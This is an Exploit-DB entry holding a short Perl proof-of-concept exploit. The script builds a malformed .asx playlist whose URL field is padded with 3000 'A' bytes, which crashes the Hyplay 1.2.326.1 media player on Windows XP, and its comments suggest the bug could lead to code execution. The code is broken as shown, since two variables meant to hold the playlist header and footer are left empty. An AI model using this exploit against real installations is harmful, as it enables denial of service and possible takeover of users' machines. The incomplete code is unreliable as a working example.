Hyplay 1.2.326.1 - .asx Local DoS Crash PoC

ID EDB-ID:12546
Type exploitdb
Reporter Steve James
Modified 2010-05-10T00:00:00


Hyplay 1.2.326.1 (.asx) Local DoS crash PoC. Dos exploit for windows platform

#Title: Hyplay 1.2.326.1 (.asx) Local DoS crash PoC
#Download: http://www.hyplay.com/download.asp
#Written/Discovered by: xsploited Security
#Tested on Windows XP SP2
#URL: http://x-sploited.com/
#Shoutz: kAoTiX, drizzle, JeremyBrown, BreTT, Deca

#A bug exists in the way Hyplay processes malformed .asx play 
#list files. This could potentially lead to code execution on 
#the users machine.

my $data1=   

my $data2="http://"; 

my $data3= #asx file footer

my $junk = "\x41" x 3000;
open(my $playlist, "> hyplay_d0s.asx");
print $playlist $data1.$data2.$junk.$data3."\r\n";
close $playlist;
print "\nEvil asx file created successfully.";